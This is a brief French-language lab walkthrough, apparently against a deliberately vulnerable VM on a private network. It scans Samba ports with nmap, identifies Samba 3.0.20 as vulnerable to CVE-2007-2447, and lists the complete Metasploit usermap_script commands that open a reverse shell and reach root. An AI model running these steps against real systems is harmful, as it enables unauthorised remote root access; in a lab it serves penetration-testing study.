
nmap -sS -sV -p 139,445 192.168.56.102
Résultat attendu :
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open microsoft-ds Samba smbd 3.0.20-Debian
👉 Version de Samba : 3.0.20 Ceci est vulnérable à CVE-2007-2447.
searchsploit samba 3.0.20
Résultat :
Samba 3.0.20 - 'Username' map script Command Execution
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.56.102
set RPORT 139
set LHOST 192.168.56.101
Le payload est automatiquement défini :
cmd/unix/reverse
Vérification :
show options
run
ou
exploit
En cas de succès :
Command shell session opened
Vérifions :
whoami
👉 Résultat :
root